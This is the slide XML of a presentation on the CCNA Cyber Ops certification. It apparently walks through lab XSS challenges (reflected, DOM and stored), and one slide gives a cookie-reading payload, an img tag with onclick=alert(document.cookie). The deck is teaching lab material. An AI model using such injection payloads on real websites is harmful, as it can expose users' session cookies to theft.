              <a:t>CCNA Cyber Ops Certification is a great start to your career in Cyber Security operations. It prepares candidates to begin a career working with associate-level Cyber Security analysts within security operations centers. This certification helps us in acquiring skills and helps in preparation to work with the Security Operations Center (SOC) teams. Today's organizations are challenged with rapidly detecting cyber security breaches and effectively responding to security incidents. Teams of people in Security Operations Centers (SOC’s) keep a vigilant eye on security systems, protecting their organizations by detecting and responding to cyber security threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C61017B8-A4C9-4B66-9AF0-34B4DC03BF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2231980" y="414635"/>
            <a:ext cx="6889836" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>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DESCRIPTION</a:t>
            </a:r>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CISCO Certified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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CyberOps</a:t>
            </a:r>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Associate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="13462">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>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818545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9801" y="851001"/>
            <a:ext cx="9560417" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>2 (Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Challenge 2 (DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>XSS):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>2 (Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Change the size of name box by inspecting element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=”#” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115287622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0763" y="736264"/>
            <a:ext cx="10180521" cy="5278170"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>(Reflected XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in the box and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>(DOM XSS):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in the default parameter and press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>enter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>(Stored XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enter payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the name box by increasing its size with inspect element and press enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The alert will trigger.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270855860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4418" y="39283"/>
            <a:ext cx="3506088" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="228600"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 1(Reflected XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277548" y="527631"/>
            <a:ext cx="5852461" cy="2944254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7981956" y="3102553"/>
            <a:ext cx="3005951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="228600"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 1(DOM XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6130009" y="3695834"/>
            <a:ext cx="5852461" cy="2944254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172979097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5450" y="91872"/>
            <a:ext cx="3198311" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="228600"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 1(Stored XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207403" y="590738"/>
            <a:ext cx="5372100" cy="3021330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350616" y="3068768"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 2(Reflected XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397581" y="3715099"/>
            <a:ext cx="5372100" cy="2977515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155590617"/>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25427" y="0"/>
            <a:ext cx="3005951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 2(DOM XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="206061" y="497849"/>
            <a:ext cx="5666705" cy="3108236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987377" y="3114472"/>
            <a:ext cx="3198311" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 2(Stored XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351758" y="3599714"/>
            <a:ext cx="5666705" cy="3121115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381156791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8356" y="0"/>
            <a:ext cx="3506088" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Challenge 3(Reflected XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="249263" y="369332"/>
            <a:ext cx="5790928" cy="3372822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588654" y="2524134"/>
            <a:ext cx="3158186" cy="677108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
